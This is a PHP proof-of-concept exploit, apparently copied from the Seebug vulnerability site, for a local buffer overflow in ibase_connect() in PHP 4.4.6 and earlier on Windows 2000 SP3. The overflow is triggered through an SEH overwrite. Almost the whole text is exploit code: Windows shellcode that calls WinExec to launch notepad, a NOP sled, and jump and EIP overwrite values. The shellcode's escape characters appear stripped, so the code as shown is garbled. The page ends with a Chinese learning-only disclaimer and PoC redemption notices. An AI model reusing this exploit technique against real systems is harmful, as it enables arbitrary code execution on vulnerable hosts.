<?php // PHP <= 4.4.6 ibase_connect() & ibase_pconnect() local buffer overflow // poc exploit // windows 2000 sp3 en / seh overwrite // by rgod // site: http://retrogod.altervista.org if (!extension_loaded(\"interbase\")){ die(\"only works with interbase extension \"); } $____scode= \"xebx1b\". \"x5b\". \"x31xc0\". \"x50\". \"x31xc0\". \"x88x43x59\". \"x53\". \"xbbxcax73xe9x77\". //WinExec \"xffxd3\". \"x31xc0\". \"x50\". \"xbbx5cxcfxe9x77\". //ExitProcess \"xffxd3\". \"xe8xe0xffxffxff\". \"x63x6dx64\". \"x2e\". \"x65\". \"x78x65\". \"x20x2f\". \"x63x20\". \"start notepad & \"; $jmp=\"xebxa1xffxeb\"; // jmp short $eip=\"x86xa0xf8x77\"; // call ebx, ntdll.dll $____suntzu=str_repeat(\"A\",2676 - strlen($____scode)); $____suntzu.=str_repeat(\"x90\",190).$____scode.str_repeat(\"x90\",10).$jmp.$eip; ibase_connect($____suntzu); ?>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论